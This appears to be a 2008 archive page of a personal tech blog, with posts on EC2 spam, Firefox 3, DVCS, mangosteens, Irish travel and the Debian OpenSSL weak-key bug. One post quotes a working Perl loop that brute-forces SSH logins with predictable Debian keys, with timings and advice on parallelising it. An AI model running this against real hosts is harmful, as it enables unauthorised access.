Skip to content

Category: Uncategorized

links for 2008-07-03

Published July 4, 2008

Amazon EC2’s spam and malware problems

Published July 2, 2008

Over the past few weeks, I've increasingly heard of spam and abuse problems originating in Amazon EC2.

This has culminated in a blog post yesterday by Brian Krebs at the Washington Post:

It took me by surprise this weekend to discover that that mounds of porn spam and junk e-mail laced with computer viruses are actively being blasted from digital real estate leased to [Amazon].

He goes on to discuss how EC2 space is now actively blocked by Outblaze, and has been listed by Spamhaus in their PBL list. A spokesperson for Amazon said:

"We have a clear acceptable use policy and whenever we have received a complaint of spam or malware coming through Amazon EC2, we have moved swiftly to strictly enforce the use policy by network isolating (or even terminating) any offending instances," Kinton said. She added that Amazon has since taken action against the EC2 systems hosting the [malware].

However as Seth Breidbart noted in the comments, 'note that Amazon will terminate the instance. That means that the spammer just creates another instance, which gets a new IP address, and continues spamming.' True enough -- as described, instance termination simply isn't good enough.

My recommendations:

  • as John Levine noted, it's likely that Amazon need to treat EC2-originated traffic similarly to how an ISP treats their DSL pools -- filtering outbound traffic for nastiness, in particular rate-limiting port 25/tcp connections on a per-customer basis, so that an instance run by (or infiltrated by) a spammer cannot produce massive quantities of spam before it is detected and cut off.

    However, I'm not talking about blocking port 25/tcp outbound entirely. That's not appropriate -- an EC2 instance is analogous to a leased colo box in a server farm, and not being able to send mail from our instances would really suck for EC2 users (like myself and my employers).

  • It would help if there were a way to look up customer IDs from the IP address of the EC2 nodes they're using -- either via WHOIS or through rDNS. Even an opaque customer ID string would allow anti-abuse teams to correlate a single customer's activity as they cycle through EC2 instances. This would allow those teams to deal with the reputation of Amazon's customers, instead of Amazon's own rep, analogous to how "traditional" hosters use SWIP to publicize their reassignments of IPs between their customers.

There's some more discussion buried in a load of knee-jerking on the NANOG thread. Here's a few good snippets:

Jon Lewis: 'I got the impression the only thing Amazon considers abuse is use of their servers and not paying the bill. If you're a paying customer, you can do whatever you like.' (ouch.)

Ken Simpson: 'IMHO, Amazon will eventually be forced to bifurcate their EC2 IP space into a section that is for "newbies" and a section for established customers. The newbie space will be widely black-listed, but will also have a lower rate of abuse complaint enforcement. The only scalable way to deal with a system like EC2 is to provide clear demarcations of where the crap is likely to originate from.'

Bill Herrin: 'From an address-reputation perspective EC2 is no different than, say, China. Connections from China start life much closer to my filtering threshold that connections from Europe because a far lower percentage of the connections from China are legitimate. EC2 will get the same treatment.'

There's also an earlier thread here.

Anyway, this issue is on fire -- Amazon need to get the finger out and deal with it quickly and effectively, before EC2 does start to run into widespread blocks. I'm already planning migration of our mail-sending components off of EC2; we're already seeing blocks of mail sent from it, and it's looking likely that these will increase. :(

(It's worth noting that a block of EC2's netblocks today will produce a load of false positives, mainly on transactional mail, if you're contemplating it. So I wouldn't recommend it. But a lot of sites are willing to accept a few FPs, it seems.)

Hack: twitter_no_popups.user.js

Published July 2, 2008

Twitter has this nasty habit -- if you come across a tweet in your feed reader containing a URL, and you want to follow that link, you can't, because Twitter doesn't auto-link URLs in its RSS feeds. Instead, you have to click on the feed item, itself, wait for that to open in the browser, then click on the link in the new browser tab. That link will, in turn, open in another new tab.

Here's a quick-hack Greasemonkey user script to inhibit this second new-tab:

twitter_no_popups.user.js

links for 2008-07-01

Published July 2, 2008

How To Eat a Mangosteen

Published July 1, 2008

'You'll know what my riddle means
When you've eaten mangosteens.'
-- The Crab That Played with the Sea, by Rudyard Kipling

When I travelled through Thailand, I got rightly hooked on the delicious mangosteen, traditionally dubbed the "Queen of Fruit" by the Thais. I've been keeping an eye out ever since, through our travels to the US and back, without any luck. (In particular, they've been blocked by US customs for a long time, although reportedly this is changing nowadays.)

Finally, last year, they appeared in our local Tesco supermarket here in Ireland -- or at least, an empty box appeared, sans fruit! That was it, though, until a couple of weeks ago, when my friend Bob was lucky enough to come across a few, and grabbed 4 for me. (Thanks Bob!)

It appears they're in season around the start of June, which is when they make it to Tesco's. Naturally, they're much more expensive here -- Tesco were selling them for about EUR 1.20 each, whereas a bag of 30 were about 50 cents when we used to buy them at the street-side in Ko Chang. But that's to be expected, really.

Since they're tricky enough to get hold of, I thought I should document exactly what to do with them once you get 'em ;)

They start off looking like this, roughly tomato-sized fruit with a thick, papery rind:

img

Get your thumbnail into the rind, not too deep though!, and tear it off like so:

img

Look at the rind's great colour! Watch out for it, though, as it stains clothing easily. Discard the rind, and pluck out the fleshy, juicy white segments:

img

(Pay no attention to their resemblance to testicles. ;)

Finally you'll wind up with 6 or so seedless segments, and 1 or 2 seed-bearing segments, larger than the others, containing a large inedible seed along with a fair bit of flesh:

img

Eat 'em and enjoy the flavour -- it's a bit like a tart, vanilla-y peach, but juicier, creamier and much smoother in texture. Mmmm, truly delicious. I'm looking forward to picking up some more soon!

I considered planting the seeds, but unfortunately, you can forget about growing a tree in your back yard; the mangosteen tree requires a tropical climate:

'The mangosteen is ultra-tropical. It cannot tolerate temperatures below 40º F (4.44º C), nor above 100º F (37.78º C). Nursery seedlings are killed at 45º F (7.22º C).'

Ah well. Seems I'll be at Tesco's mercy for more.

links for 2008-06-30

Published July 1, 2008

links for 2008-06-27

Published June 28, 2008

links for 2008-06-26

Published June 27, 2008

links for 2008-06-25

Published June 26, 2008

links for 2008-06-23

Published June 24, 2008

VCS and the 1993 internet

Published June 23, 2008

Joey Hess suggests that current discussions about the superfluity of DVCS systems have a parallel in how the internet protocol world, circa 1993, played out:

I'm reminded of 1993. Using the internet at that time involved using a mishmash of stuff -- Telnet, FTP, Gopher, strange things called Archie and Veronica. Or maybe this CERN "web" thing that Tim Berners-Lee had just invented a few years before, but that mostly was useful to particle physicists.

Then in 1994 a few more people put up web sites, then more and more, and suddenly there was an inflection point. Suddenly we were all browsing the web and all that other stuff seemed much more specialised and marginalised.

I would disagree, a little. Back in the early '90's, I was a sysadmin playing around with internet- and intranet-facing TCP/IP services (although in those days, the term "intranet" hadn't been coined yet), so I gained a fair bit of experience at the coal-face in this regard. The mish-mash of protocols -- telnet, gopher, Archie, WAIS, FTP, NNTP, and so on -- all had their own worlds and their own views of the 'net. What changed this in 1993 was not so much the arrival of HTTP, but TimBL's other creation: the URL.

The URL allowed all those balkanized protocols to be supported by one WWW client, and allowed a HTML document to "link" to any other protocol --

The WWW browsers can access many existing data systems via existing protocols (FTP, NNTP) or via HTTP and a gateway. In this way, the critical mass of data is quickly exceeded, and the increasing use of the system by readers and information suppliers encourage each other.

This was a great "embrace and extend" manoeuvre by TimBL, in my opinion -- by embracing the existing base of TCP/IP protocols, the WWW client became the ideal user interface to all of them. Once NCSA Mosaic came along, there really was no alternative to rival the Web's ease of use. This was the case even if you didn't have a HTTP server of your own; you could still access HTML documents and remote URLs.

In essence, HTML and the URL were the trojan horse, paving the way for HTTP (as HTML's native distribution protocol) to succeed. It wasn't the web sites that helped the WWW "win", but embrace-and-extend via the URL.

For what it's worth, I think there is an interesting parallel in today's DCVS world: git-svn.

links for 2008-06-18

Published June 19, 2008

Firefox Download Evening

Published June 17, 2008

Download Day

Happy Firefox Download Day -- or rather, Firefox Download Evening!

It turns out that the "day" in question has been defined as a 24-hour period starting at 10am Pacific Time; rather than compensating for the effects of timezones around the world, they've just picked an arbitrary 24-hour period.

That's 6pm in Irish time, for example. At least I'm not one of the 57,000 Japanese pledgers, who'd be waiting up until 2am to kick off their download. It seems a little bizarre that there's little leeway provided for non-US downloaders, who are right now twiddling their thumbs, waiting, while their "day" passes.

Annoyingly, the main world record page simply says 'the official date for the launch of Firefox 3 is June 17, 2008' -- no mention of a starting time or official timezone at all!

This is the top thread on their forum right now -- in addition to the omission of an entire continent ;)

links for 2008-06-16

Published June 17, 2008

adding to the “Going Dark” and DVCS debate

Published June 16, 2008

On programmers "going dark" -- Aristotle Pagaltzis writes:

Jeff Atwood argues that open source projects are in real danger of programmers “going dark,” which means they lock themselves away silently for a long time, then surface with a huge patch that implements a complex feature.

It seems to me that this is as much a technological problem as a social issue... and that we have the technological solution figured out: it’s called distributed version control. It means that that lone developer who locked himself in a room need not resurface with a single huge patch – instead, he can come back with a branch implementing the feature in individually comprehensible steps. At the same time, it allows the lone programmer to experiment in private and throw away the most embarrassing mistakes, addressing part of the social problem.

However, I don't think he realised that the Jeff Atwood story he responded to was in fact an echo of Ben Collins-Sussman's original article, where he specifically picked out DVCS as a source of this danger:

A friend of mine works on several projects that use git or mercurial. He gave me this story recently. Basically, he was working with two groups on a project. One group published changes frequently...

“…and as a result, I was able to review consistently throughout the semester, offering design tweaks and code reviews regularly. And as a result of that, [their work] is now in the mainline, and mostly functional. The other group [...] I haven’t heard a peep out of for 5 months. Despite many emails and IRC conversations inviting them to discuss their design and publish changes regularly, there is not a single line of code anywhere that I can see it. [...] Last weekend, one of them walked up to me with a bug [...] and I finally got to see the code to help them debug. I failed, because there are about 5000 lines of crappy code, and just reading through a single file I pointed out two or three major design flaws and a dozen wonky implementation issues. I had admonished them many times during these 5 months to publish their changes, so that we (the others) could take a look and offer feedback… but each time met with stony silence. I don’t know if they were afraid to publish it, or just don’t care. But either way, given the code I’ve seen, the net result is 5 wasted months.”

Before you scream; yes yes, I know that the potential for cave-hiding and writing code bombs is also possible with a centralized version control system like Subversion. But my friend has an interesting point:

“I think this failure is at least partially due to the fact that [DVCS] makes it so damn easy to wall yourself into a cave. Had we been using svn, I think the barrier to caving would have been too high, and I’d have seen the code.”

In other words, yes, this was fundamentally a social problem. A team was embarrassed to share code. But because they were using distributed version control, it gave them a sense of false security. “See, we’re committing changes to our repository every day… making progress!” If they had been using Subversion, it’s much less likely they would have sat on a 5000 line patch in their working copy for 5 months; they would have had to share the work much earlier.

To be honest, I'd tend to agree with Aristotle; just because centralized VC makes it harder to maintain a "private branch" with this "high barrier to caving", and this therefore imposes a technical pressure to fix a social problem, doesn't mean that is a good thing. I'd prefer to fix the DVCS to apply social pressure, and have both working tools and a working social organisation.

Another commenter on Ben's original post put it well:

I [..] disagree, strongly, that DVCS makes code hiding any more difficult than single-branch VCS. When using a single branch, it’s usually a very small group of people who are allowed to commit. Any patches from non-core contributors get lost in a tangle of IRC pastebins, mailing lists, bug trackers, and blog posts. Furthermore, even if these patches are eventually committed, they have lost all their associated version information — the destructive rebase you complain about. DVCS allows anybody to branch from trunk, record their changes, and publish their branch in a service like Launchpad or github. For an example of this, look at the mass of user-created branches for popular projects like GNOME Do or AWN.

It's very interesting to see those Launchpad sites, in my opinion.

I've spent many years shepherding contributions to SpamAssassin through our Bugzilla. We've often lost rule contributors, who are particularly hard to attract for some reason, due to delays and human overhead involved in this method. :( So an improved interface for this would be very useful...

links for 2008-06-12

Published June 13, 2008

links for 2008-06-11

Published June 12, 2008

Ireland tourism tips

Published June 5, 2008

connemara

So, Nelson is apparently contemplating a trip to Ireland, and was looking for tips. Since he's not the first to ask, I thought I'd do some research among my friends on things to do and good places to stay and eat in our native country. Here's the result.

First off -- it's worth noting that we're all thirty-somethings, so backpacker stuff and heavy boozing is no longer on the menu. If you're after that, though, head for Temple Bar in Dublin ;) This is mainly nice hotels, good food, and interesting things to look at.

To start with, I'd recommend driving as a means of getting around. Lots of the good stuff can't be reached any other way, and the roads are generally pretty good nowadays (if a little narrow).

Prepare for rain.

Things to do: Connemara and Kerry are stunning; in my opinion, they're unmissable, if you're coming to Ireland in search of natural beauty. Clare and West Cork are pretty good too. Generally, the west coast is the place to go.

A friend recommends the Skelligs: 'the best thing I've seen in Ireland. If its sunny. If its raining it sucks so don't go.' (I've never been -- appalling, given that my great-grandfather wrote one of the definitive works on them, I need to fix that.)

Stuff to avoid: Dublin's not too hot, unfortunately. Over-priced and hard to get around due to traffic. I mean, it's quite nice, especially to live in, but as a tourist destination compared to other cities around the world I don't quite get the attractiveness. Also, the south-east corner of the country, while full of nice friendly people, is exorbitantly expensive in my experience (even pricier than Dublin!), short on good stuff to see, and a bit of a washout, so I say skip it. (I have no idea why it's so expensive, BTW. my theory is that it's a traditional in-country holiday venue for Dubliners, and the Wexford inhabitants love to fleece us, so we got fleeced. whatever.)

In general, I'd say the larger towns aren't too exciting; stick to the country.

The Lonely Planet guide to Ireland, while frequently backpacker-oriented, is pretty good for non-backpacker stuff as well. If you're driving around, it's a good source of offbeat stuff to check out. I used it a lot when driving around Connemara last year. They also do a great book of hikes which I can recommend.

Next, places to stay... that friend again: 'if you're doing the Ring of Kerry, I strongly recommend diverting to Valentia and staying in Glanleam House (beautiful grub, beautiful gardens, cheap) and doing a day trip from there to the Skelligs.'

Temple House in Sligo also comes recommended: 'a classical Georgian mansion set in an estate of 1,000 acres, overlooking a 13th century lakeside castle of the Knights Templar.'

There are lots of useless hotel/B&B sites in Google, making it hard to tell crap from quality. But these sites come recommended:

  • Ireland's Blue Book - 'luxury accommodation in Irish Country House Hotels, Manor Houses and Castles. Also listed are Ireland's finest gourmet restaurants.' This is high-end stuff, but it's pretty reliable, as far as I can see.

  • Friendly Homes of Ireland - another friend says 'aka crazy houses of Ireland -- terrible webpage, but good accommodation (its also a more attractive guide). We stayed here and loved it.'

  • Hidden Ireland - 'a unique collection of historic private houses which provide the very best and most stylish country house accommodation available in Ireland - great Irish hospitality at an affordable price. Our houses are not hotels and are very much more than ordinary guesthouses. They all offer a rare opportunity to experience the lifestyle of a bygone age - a special and fascinating alternative to conventional tourist accommodation.'

  • Irish Landmark Trust, if you're interested in self-catering stays at heritage houses.

  • Georgina Campbell guidebooks are apparently quite good.

Finally, scams and rip-offs are few and far between, so that's not something to worry about. Crappy service and mediocre food, however, is more likely to be the source of problems. At least you can now get decent espresso pretty much everywhere!

Hope that helps someone ;) Got tips of your own? Feel free to add comments!

links for 2008-06-04

Published June 4, 2008

links for 2008-06-01

Published June 1, 2008

links for 2008-05-30

Published May 30, 2008

TypePad AntiSpam

Published May 30, 2008

TypePad AntiSpam looks pretty cool. I've been trying it out for the past week on taint.org and underseacommunity.com, with no false positives or false negatives so far (although mind you I don't get much spam, anyway, on those blogs, fortunately). Both are WordPress blogs -- I set up Akismet, got a TypePad API key, and edited 3 lines in "wp-content/plugins/akismet/akismet.php", and I was off.

However, here's the key bit, the bit I'm most excited about -- /svn/antispam/trunk/, particularly the GPL v2 LICENSE file -- a fully open source backend!

The backend is a perl app built on Gearman and memcached. It uses DSpam instead of SpamAssassin, but hey, you can't have everything ;) Nice, clean-looking perl code, too. Here's hoping I get some tuits RSN to get this installed locally...

Daily links are back again

Published May 30, 2008

I've been talking to a few people recently who read taint.org (thanks!), but don't follow the linkblog. This means they miss half of the good bits I post :( Also, there's no way to comment on linkblog stuff, which is suboptimal.

To remedy this, I'm turning on daily links posting again, where I'll post the day's links, once a day, to the main blog.

If you're not interested, feel free to subscribe to this 'no-links' feed URL instead of the default -- it's the main blog content, but with the links posts filtered out.

Upgrading to Firefox 3

Published May 29, 2008

Firefox 3 Release Candidate 1 was released earlier this month. I've upgraded.

I tried switching to it a couple of months back, but gave up, since my favourite extensions were AWOL. This time around though, they're almost all present. Since Firefox is now basically an operating system in its own right, with upgrade pain all of its own, and a couple of people have asked, here's what I needed to do to get from Firefox 2 to 3:

Make a list of my favoured extensions

Namely, from most important to least:

Create a new Mozilla profile

This allowed me to keep my Firefox 2.0 settings entirely intact, a key step. Install Firefox 3, and start it with "firefox -ProfileManager", then create a new profile and start with that.

Get installing

The following extensions from the above list were available by now for Firefox 3, through addons.mozilla.org:

Firebug was slightly trickier, since you need the 1.1 beta version, directly from their site 1.2 beta version, specially designed for Firefox 3 support, available only from their 'releases' page.

However, Greasemonkey, SubmitToTab, and MozEx were still missing. :(

Greasemonkey, thankfully, wasn't too hard to find -- the latest nightly build from this directory does the trick.

MozEx seems dead -- the Firefox 2 support was added in a development snapshot, and there's no sign of Firefox 3 support. This was in danger of becoming a show-stopper, since I spend all day editing text in browser textareas in Trac, Bugzilla, and Wordpress -- until I found It's All Text!, which is even slightly prettier and simpler than MozEx. yay. The only thing to watch out for is that after setting the path to the editor command, I had to quit and restart the browser for it to recognise it as valid.

SubmitToTab is the only desirable plugin remaining. It looks like it won't be making it any time soon, but I'm prepared to live without it. ;)

Also, while discussing this on Twitter, Vipul wondered if XPather was available -- turns out that yes, v1.4 of XPather supports FF3. Looks cool too; I've installed it ;)

Copy bookmarks

Exit the browser, copy the "bookmarks.html" file from the old profile directory (~/.mozilla/firefox/jocfzbfo.jm in my case) to the new one (~/.mozilla/firefox/7bkf89ws.ff3), and restart it.

I didn't bother copying cookies -- I'm happy to log in again on all those sites. (I don't like carrying too much baggage between upgrades...)

I also opened the Greasemonkey user scripts dir (~/.mozilla/firefox/jocfzbfo.jm/gm_scripts), clicked on each script there, and installed them that way to FF3. A little laborious, but nothing serious really.

Done!

End result: I'm using FF3, and it's working quite nicely. Memory usage is consistently below 300MB, so far -- I haven't seen any bloating yet, which is a big improvement. I'm probably going to stick with it.

One thing: I did have to turn off the new image scaling effect, however -- text font size modification also now scales images to match, which is very annoying (and jaggy). No Squint allows this quite neatly.

More details on the “GMail forwarding hole”

Published May 28, 2008

Those INSERT guys who've been talking about a GMail security hole allowing spammers to relay spam, have released more previous-redacted details here. (thanks to the MailChannels blog for pointing that out.)

In essence, the attack works by allowing a spammer to set the "forward to" address in GMail to point at a target address, send a spam to the GMail account, then change the "forward to" address to the next target and repeat.

My response:

  1. it'd be trivial for Google to impose stringent rate limits on "forward to" address changes, and I'd be surprised if they haven't already.

  2. ditto rate-limiting on the rate of forwarding messages for each GMail account.

  3. as they say in the paper -- if Google required up-front confirmation of the target address before forwarding any mail, that would also cut this out neatly.

  4. It's worth noting that GMail's outbound servers may be whitelisted by some recipient sites, others are treating them negatively -- word on the anti-spam "street" is that GMail is becoming a festering pit of 419 scammers these days.

Ammado spam

Published May 26, 2008

Quoting an old job post: 'ammado.com are a new online global community with headquarters in Dublin, Ireland. ammado are developing a fun interactive online entertainment platform catering for a huge global market, using the latest technologies.'

Well, using that and spam, it seems. Look what just arrived in my inbox:

  • X-Spam-Status: No, score=-8.0 required=5.0 tests=BAYES_50, EXTRA_MPART_TYPE, HABEAS_ACCREDITED_COI, HTML_MESSAGE, RP_MATCHES_RCVD,SPF_PASS shortcircuit=no autolearn=unavailable version=3.3.0-r650054
  • X-Spam-Relays-External: [ ip=89.101.128.81 rdns=mail.ammado.com helo=mail.ammado.com by=soman.fdntech.com ident= envfrom= intl=0 id=4856CBA51B8 auth= msa=0 ] [ ip=192.168.11.20 rdns= helo=amsrvmail001.ammado.local by=amsrvmail001.ammado.local ident= envfrom= intl=0 id= auth= msa=0 ]
  • From: Peter Conlon <pconlon/at/ammado.com>
  • Date: Mon, 26 May 2008 10:45:11 +0100
  • Subject: UNHCR asks the blogosphere for help

UNHCR and ammado, http://www.ammado.com are reaching out to the blogosphere in an effort to spread the word for this year's World Refugee Day on June 20th and raise awareness of the situation of refugees all over the world!

This year, World Refugee Day is about protection, the heart and soul of UNHCR. With rising oil prices, decreasing food supplies, the adverse affects of climate change, the ongoing crisis in Darfur and a high number of unexpected natural disasters including those in Myanmar and China, the world's refugees have never been more in need of protection.

Another day, another spam. They also spammed Donncha, Michele and Damien, so it sounds like they're doing the rounds of the Irish blogosphere.

(Update: add Tom, Suzy, Alexia, squid at Limerick Blogger, and Grandad at Head Rambles to that list, too.)

However -- the hit on the HABEAS_ACCREDITED_COI SpamAssassin rule means that Ammado are a member of the Habeas Accredited Confirmed-Opt-In program, meaning that they have undertaken a bond to only email people who signed up to receive their communications using "confirmed opt-in". I have never had any dealings with Ammado, or opted in in any way to receive communication from them -- let alone confirmed an opt-in. This is out-and-out unsolicited bulk email, or spam, so this may turn out to be an expensive mistake for Ammado.

If you also got spammed by a Habeas-accredited sender, send a complaint to complaints /at/ habeas.com. This is how the Habeas system works...

PS: This is a good illustration of how spam is not Unsolicited Commercial Email, but UBE -- Unsolicited Bulk Email. Even though this is non-commercial, it's still spam!

MailChannels’ Traffic Control now free-as-in-beer

Published May 19, 2008

I'm on the technical advisory board for MailChannels, a company who make a commercial traffic-shaping antispam product, Traffic Control. Basically, you put it in front of your real MTA, and it applies "the easy stuff" -- greet-pause, early-talker disconnection, lookup against front-line DNSBLs, etc. -- in a massively scalable, event-driven fashion, handling thousands of SMTP connections in a single process. By taking care of 80% of the bad stuff upfront, it takes a massive load off of your backend -- and, key point, off your SpamAssassin setup. ;)

Until recently, the product was for-pay and (relatively) hard to get your hands on, but as of today, they're making it available as a download at http://mailchannels.com/download/. Apparently: "it's free for low-volume use, but high volume users will need a license key."

Anyway, take a look, if you're interested. I think it's pretty cool. (And I'm not just saying that because I'm on their tech advisory board. ;)

LWN.net on the Debian OpenSSL fiasco

Published May 19, 2008

Great article from LWN.net regarding the Debian OpenSSL vulnerability:

It is in the best interests of everyone, distributions, projects, and users, for changes made downstream to make their way back upstream. In order for that to work, there must be a commitment by downstream entities -- typically distributions, but sometimes users -- to push their changes upstream. By the same token, projects must actively encourage that kind of activity by helping patch proposals and proposers along. First and foremost, of course, it must be absolutely clear where such communications should take place.

Another recently reported security vulnerability also came about because of a lack of cooperation between the project and distributions. It is vital, especially for core system security packages like OpenSSH and OpenSSL, that upstream and downstream work very closely together. Any changes made in these packages need to be scrutinized carefully by the project team before being released as part of a distribution's package. It is one thing to let some kind of ill-advised patch be made to a game or even an office application package that many use; SSH and SSL form the basis for many of the tools used to protect systems from attackers, so they need to be held to a higher standard.

+1.

The viability of remote SSH key cracking

Published May 16, 2008

Here's some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:

May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1

ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

  1. RSA is the default if you don't specify for ssh-keygen
  2. 99.99% of people use x86
  3. PID is sequential, and there's almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there's about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine -- you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.

Free SSL cert reissuance for Debian victims — unless you’re on RapidSSL

Published May 16, 2008

If you've been following the Debian OpenSSL pRNG security debacle, you may have noticed that there's a painful problem for people who've used a Debian or Ubuntu system in the process of buying a commercial SSL key -- they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though -- some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key's CSR, and submit it to your CA according to their reissuance policy:

  • GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)
  • Thawte: Here (Available throughout the lifetime of the certificate.)
  • VeriSign: Unknown
  • GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process "re-keying", while they call the act of sending you the same signed certificate as your original order a "reissuance".)
  • ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.
  • CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time as it seems that many users are re issue there certificate.
  • Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don't really. Their low-cost RapidSSL certs require that you buy 'reissue insurance' for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :( Wiki updated.

Update: RapidSSL certs are, indeed, now free to reissue! Use this URL and click through on the "buy" link for reissuance insurance -- the price quoted will be $0. Wiki re-updated ;). (thanks to ServerTastic for the tip.)

Serious Debian/Ubuntu openssl/openssh bug found

Published May 13, 2008

via Reddit, this Debian Security announcement:

'Luciano Bello discovered that the random number generator in Debian's openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.

It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! --jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.'

and, of course, here's the Ubuntu Security Notice for the hole:

Who is affected

Systems which are running any of the following releases:

  • Ubuntu 7.04 (Feisty)
  • Ubuntu 7.10 (Gutsy)
  • Ubuntu 8.04 LTS (Hardy)
  • Ubuntu "Intrepid Ibex" (development): libssl <= 0.9.8g-8
  • Debian 4.0 (etch) (see corresponding Debian security advisory)

and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.

It was apparently caused by this incorrect "fix" applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.

Bad news....

Update: Ben Laurie tears into Debian for this:

What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally - they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to "add value" by getting in between the user of the software and its author.

+1!

For what it's worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that's one way to reduce the risk of upstream-vs-package fork bugs like this, since we'd have spotted that change going in, and nixed it before it caused this failure.

Here's a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?

This comment puts it a little strongly, but is generally on the money in this regard:

the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter --jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL's responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.

I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.

Update 2: this Reddit comment explains the hole in good detail:

